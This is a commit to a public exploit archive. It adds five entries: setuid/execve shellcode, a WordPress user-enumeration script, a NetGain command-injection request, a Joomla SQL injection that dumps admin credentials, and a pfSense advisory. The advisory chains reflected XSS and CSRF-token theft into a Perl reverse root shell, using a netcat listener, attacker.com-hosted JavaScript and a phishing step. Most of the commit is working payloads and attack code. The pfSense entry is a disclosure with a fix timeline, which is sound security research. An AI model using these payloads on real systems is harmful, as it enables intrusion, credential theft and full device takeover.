DB: 2017-03-04

5 new exploits

Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)
Wordpress < 4.7.1 - Username Enumeration
NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection
Joomla! Component Coupon 3.5 - SQL Injection
pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2017-03-04 05:01:19 +00:00
parent a3ee969c7d
commit d3106003d4
6 changed files with 446 additions and 0 deletions

View file

@ -15927,6 +15927,7 @@ id,file,description,date,author,platform,type,port
41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -37411,3 +37412,7 @@ id,file,description,date,author,platform,type,port
41494,platforms/php/webapps/41494.txt,"Joomla! Component StreetGuessr Game 1.0 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
41495,platforms/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
41496,platforms/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
41497,platforms/php/webapps/41497.php,"Wordpress < 4.7.1 - Username Enumeration",2017-03-03,Dctor,php,webapps,0
41499,platforms/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps,0
41500,platforms/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps,0
41501,platforms/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps,0

Can't render this file because it is too large.

43
platforms/jsp/webapps/41499.txt Executable file
View file

@ -0,0 +1,43 @@
# Exploit Title: NetGain Enterprise Manager “Ping” Command Injection
# Date: 23.02.2017
# Exploit Author: MrChaZ
# Vendor Homepage: http://www.netgain-systems.com/
# Version: <= v7.2.562 build 853
# Tested on: Windows 10 Pro 64-bit (10,0 Build 14393
Description:
===========================================================================
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
https://www.owasp.org/index.php/Command_Injection
Vulnerable Menu:
===========================================================================
[+] Tools Ping
Proof of Concept:
===========================================================================
POST /u/jsp/tools/exec.jsp HTTP/1.1
Host: 192.168.0.13:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.13:8081/u/index.jsp
Content-Length: 97
Cookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF
Connection: close
Pragma: no-cache
Cache-Control: no-cache
command=cmd+%2Fc+ping&argument=127.0.0.1+%7C+whoami&async_output=ping1487856455258&isWindows=true
-
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 70
Date: Thu, 23 Feb 2017 13:27:40 GMT
Connection: close

View file

@ -0,0 +1,50 @@
;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/03/polysetuidexecve1434.html
global _start
section .text
_start:
; setuid(0)
xor edi,edi
push rdi ; null terminator for the following string
push 105
pop rax
; push /bin//sh in reverse
mov rbx,0xd0e65e5edcd2c45e
syscall
; execve
ror rbx,1
mov al,59
push rbx
xchg esi,edi
push rsp
cdq
; store /bin//sh address in RDI, points at string
pop rdi
; Call the Execve syscall
syscall

26
platforms/php/webapps/41497.php Executable file
View file

@ -0,0 +1,26 @@
#!usr/bin/php
<?php
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: dctoralves@protonmail.ch
#Site: https://mateuslino.tk
header ('Content-type: text/html; charset=UTF-8');
$url= "https://bucaneiras.org/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
echo "*-----------------------------*\n";
foreach($json as $users){
echo "[*] ID : |" .$users['id'] ."|\n";
echo "[*] Name: |" .$users['name'] ."|\n";
echo "[*] User :|" .$users['slug'] ."|\n";
echo "\n";
}echo "*-----------------------------*";}
else{echo "[*] No user";}
?>

27
platforms/php/webapps/41500.txt Executable file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Joomla! Component Coupon v3.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_coupon
# Date: 03.03.2017
# Vendor Homepage: http://joomla6teen.com/
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/gifts-a-coupons/coupon/
# Demo: http://demo.joomla6teen.com/couponmanager/
# Version: 3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&task=mail_box&=[SQL]
# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&catid=[SQL]
# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&storeid=[SQL]
# For example;
# DATABASE > demojoom_coupon3
# TABLES > wl6xp_users
# COLUMNS > username, password
# DATA
# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&catid=7+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,char(58),password)+AS+CHAR),0x7e))+FROM+wl6xp_users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# admin:$2y$10$IeBQiHyJNpZ7mVVNlmW7..Xr5I4tSTlN5Dq7QVltnjtWmaWu2J4
# Etc..
# # # # #

295
platforms/php/webapps/41501.txt Executable file
View file

@ -0,0 +1,295 @@
######################################################################
# Exploit Title: pfSense 2.3.2 XSS - CSRF-bypass & Reverse-root-shell
# Date: 01/03/2017
# Author: Yann CAM @ASafety / Synetis
# Vendor or Software Link: www.pfsense.org
# Version: 2.3.2
# Category: XSS, CSRF-bypass and Remote root reverse-shell Access
# Google dork:
# Tested on: FreeBSD
######################################################################
pfSense firewall/router distribution description :
======================================================================
pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition
to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package
system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution.
pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations
ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations
protecting thousands of network devices.
This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the
embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however
it is not our primary focus.
In version 2.3.2 of the distribution, differents XSS vulnerabilities allow CSRF security mechanisms bypass and RCE reverse
root shell can be triggered. It is strongly advised to update to version 2.3.2 available now.
Demonstration video : https://www.youtube.com/watch?v=IWtf6LlfP_c&t=4s
Proof of Concept 1 - Reflected Cross-Site Scripting :
======================================================================
There are several RXSS in GET parameter available on the pfSense WebGui, example :
File status_captiveportal_expire.php lines 69-73 :
$cpzone = $_GET['zone'];
if (isset($_POST['zone'])) {
$cpzone = $_POST['zone'];
}
$cpzone = strtolower($cpzone);
then reflection lines 100-104 :
$tab_array[] = array(gettext("Active Users"), false, "status_captiveportal.php?zone={$cpzone}");
$tab_array[] = array(gettext("Active Vouchers"), false, "status_captiveportal_vouchers.php?zone={$cpzone}");
$tab_array[] = array(gettext("Voucher Rolls"), false, "status_captiveportal_voucher_rolls.php?zone={$cpzone}");
$tab_array[] = array(gettext("Test Vouchers"), false, "status_captiveportal_test.php?zone={$cpzone}");
$tab_array[] = array(gettext("Expire Vouchers"), true, "status_captiveportal_expire.php?zone={$cpzone}");
List of parameters vulnerable to reflected XSS:
* status_captiveportal.php: "order", "zone"
* status_captiveportal_expire.php: "zone"
* status_captiveportal_test.php: "zone"
* status_captiveportal_voucher_rolls.php: "zone"
* status_captiveportal_vouchers.php: "zone"
Result with a direct call to this page (authenticated session) :
http://<PFSENSE>/status_captiveportal_expire.php?zone="><script>alert(1337);</script>
These RXSS are through GET parameters, so they are triggered directly on page loading (doesn't need any CSRF token).
CSRF token security mechanism protect only RXSS through POST parameters in the pfSense context.
Proof of Concept 2 - Bypass all CSRF protection via R-XSS :
======================================================================
Via the R-XSS in GET parameter identified previously, it's possible for an attacker to bypass all CSRFMagic mechanisms
in the pfSense WebGUI.
Through this XSS in GET param, an attacker can benefit of the current pfSense context in a victim's browser already
logged as administrator in pfSense web administration interface.
Via this XSS, the attacker can forge his own and hidden request in the victim browser, with :
* Right referer for bypassing anti-CSRF mechanisms
* Request page to get a valid CSRF token to forge final form submissions with admin rights
The next piece of JavaScript-JQuery can make any CSRF with right referer and security token retrieved in pfSense context :
// Function with JQuery AJAX request
// This function requests an internal WebGUI page, which contains the token.
// Source code of this webpage is passed to the extractToken() function.
function loadToken(){
$.ajax({
type: 'POST',
url: '/diag_command.php',
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: '',
success:extractToken
}); // after this request, we called the extractToken() function to extract the token
}
// Function called after AJAX request in a defined page of the context, which contains the token value
function extractToken(response){
// response var contain the source code of the page requested by AJAX
// Regex to catch the token value
var regex = new RegExp("<input type='hidden' name='__csrf_magic' value=\"(.*)\" />",'gi');
var token = response.match(regex);
token = RegExp.$1;
// Pass the token to the final function which make the CSRF final attack
//alert(token);
makeCSRF(token);
}
If this script is loaded from the previous XSS, all web-forms in the pfSense WebGui can be submitted as a legitimate
and authenticated user (like administrator).
Proof of Concept 3 : R-XSS to CSRF to Remote Reverse root Shell
======================================================================
pfSense distribution provides some internal tools / commands like "perl".
Example of one-liner Perl reverse-root-shell in command line :
[2.3.2-RELEASE][admin@pfSense.localdomain]/usr/local/www: perl -e 'use Socket;$i="[ATTACKER_IP]";$p=[ATTACKER_PORT];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STen(STDERR,">&S");exec("/bin/sh -i");};'
Plus, through the WebGui as administrator, it's possible to execute system command (shell) directly in the web browser as root user :
http://<PFSENSE>/diag_command.php
POST parameter for command execution to this page are (via PHP script) :
txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=[PAYLOAD]&submit=EXECPHP&__csrf_magic=[CSRFTOKEN]
So, by chaining the R-XSS, bypass any anti-CSRF protection and with some AJAX calls with right referer / right CSRF token,
an attacker can gain a full reverse-shell as root on the pfSense :
1/ Step one : the attacker puts a netcat in listen mode on port 4444 on his computer
$ nc -l -vv -p 4444
2/ Step two : the attacker puts the next x.js JavaScript file on his webserver http://attacker.com/x.js :
var hash = window.location.hash.substring(1);
var lhost = hash.substring(hash.indexOf("lhost=")+6, hash.indexOf("&"));
var lport = hash.substring(hash.indexOf("lport=")+6, hash.length);
var payload='system%28%27%2fusr%2flocal%2fbin%2fperl%20-e%20%5C%27use%20Socket%3B%24i%3D%22' + lhost + '%22%3B%24p%3D' + lport + '%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%5C%27%27%29%3B';
// Function with JQuery AJAX request
// This function requests an internal WebGUI page, which contains the token.
// Source code of this webpage is passed to the extractToken() function.
function loadToken(){
$.ajax({
type: 'POST',
url: '/diag_command.php',
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: '',
success:extractToken
}); // after this request, we called the extractToken() function to extract the token
}
// Function called after AJAX request in a defined page of the context, which contains the token value
function extractToken(response){
// response var contain the source code of the page requested by AJAX
// Regex to catch the token value
var regex = new RegExp("<input type='hidden' name='__csrf_magic' value=\"(.*)\" />",'gi');
var token = response.match(regex);
token = RegExp.$1;
// Pass the token to the final function which make the CSRF final attack
//alert(token);
makeCSRF(token);
}
// This function use JQuery AJAX object.
// The token var is needed to perform the right CSRF attack with the context referer
function makeCSRF(token){
// Final CSRF attack with right referer (because executed in the context)
// and with right token captured above
$.ajax({
type: 'POST',
url: '/diag_command.php',
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: 'txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=' + payload + '&submit=EXECPHP&__csrf_magic=' + token
}); // payload of your choice
}
if (trigger){
} else {
var trigger = function(){
// Load JQuery dynamically in the targeted context
var headx = document.getElementsByTagName('head')[0];
var jq = document.createElement('script');
jq.type = 'text/javascript';
jq.src = 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq);
// Waiting 2 secondes for correct loading of JQuery added dynamically.
// Then, run the first AJAX request in the WebGUI context to retrieve the token
setTimeout('loadToken()', 2000);
};
trigger();
}
3/ Step three : the attacker generates the RXSS / anti-CSRF / RCE-root final URL :
http://<PFSENSE>/status_captiveportal_expire.php?zone="><script src="http://attacker.com/x.js"></script>#lhost=[ATTACKER_IP]&lport=[ATTACKER_PORT]
4/ Finaly, the attacker sends this URL (hidden via bitly.com for example) to a pfSense sysadmin and wait for the reverse root shell.
Tested and validated with Firefox latest version 50.1.0.
I have created some BeEF modules to exploit the same vulnerability / scenario.
This full PoC can be seen in the demonstration video here : https://www.youtube.com/watch?v=IWtf6LlfP_c&t=4s
pfSense 2.3.2 contains several security mechanisms and security best-practices like:
- X-Frame-Option header
- POST form-submission token anti-CSRF
- Referer checking to protect against CSRF
But just with a simple RXSS in GET, all these security best-practices can be bypassed to gain a full reverse root shell remotely.
Mitigation:
======================================================================
I suggest to double-check all $_GET/$_POST params directly reflected in the pfSense PHP source code without sanitization.
Plus, some HTTP headers can be added in pfSense for a better security, like:
- X-XSS-Protectoin
- X-Content-Type-Options
- CSP header
- Etc.
Solution:
======================================================================
2017-02-20: Release 2.3.3
Additional resources :
======================================================================
- www.pfsense.org
- www.synetis.com
- blog.pfsense.org/?p=2325
- www.asafety.fr
- www.youtube.com/watch?v=IWtf6LlfP_c&t=4s
- doc.pfsense.org/index.php/2.3.3_New_Features_and_Changes
- pfsense.org/security/advisories/pfSense-SA-17_01.webgui.asc
- github.com/pfsense/pfsense/pull/3288
- github.com/pfsense/pfsense/pull/3288/commits/9ec212fb11e4b2825acda68279c7e9553186c06d
- github.com/pfsense/pfsense/pull/3288/commits/992dd571bcad6508ccea0f478491183d7c7e3c4c
- github.com/beefproject/beef/commit/2f632bcbcd0a73ff2d300110bfdec81986e88285
Report timeline :
======================================================================
2016-12-17 : Vulnerability found
2016-12-18 : pfSense team alerted with details, PoC, mitigation proposal through github pull request
2016-12-18 : pfSense team feedback via github
2017-02-20 : pfSense 2.3.3 release with fix
2017-02-22 : BeEF module pull request
2017-03-01 : Public advisory
Credits :
======================================================================
88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security
Yann CAM - Security Researcher @ASafety / Security Consultant @Synetis
Last word :
======================================================================
Thank you to all the pfSense team for professionalism and quality solution despite of these few weaknesses.
--
SYNETIS
CONTACT: www.synetis.com